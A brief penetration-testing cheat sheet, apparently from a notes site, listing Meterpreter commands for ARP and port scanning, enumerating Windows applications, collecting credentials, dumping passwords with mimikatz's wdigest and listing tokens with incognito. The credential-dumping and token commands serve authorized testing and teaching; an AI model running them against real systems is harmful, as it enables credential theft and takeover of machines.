Metasploit
Meterpreter
Arp Scan
run arp_scanner -r <iP>/24Nmap
db_nmap -sS -A <IP> PortScan
run auxiliary/scanner/portscan/tcpApplication Info
run post/windows/gather/enum_applicationsCredential Gathering
run post/windows/gather/credentials/credential_collector
load mimikatz
wdigest
load incognito
list_tokens -u Windows
AD
Last updated
Was this helpful?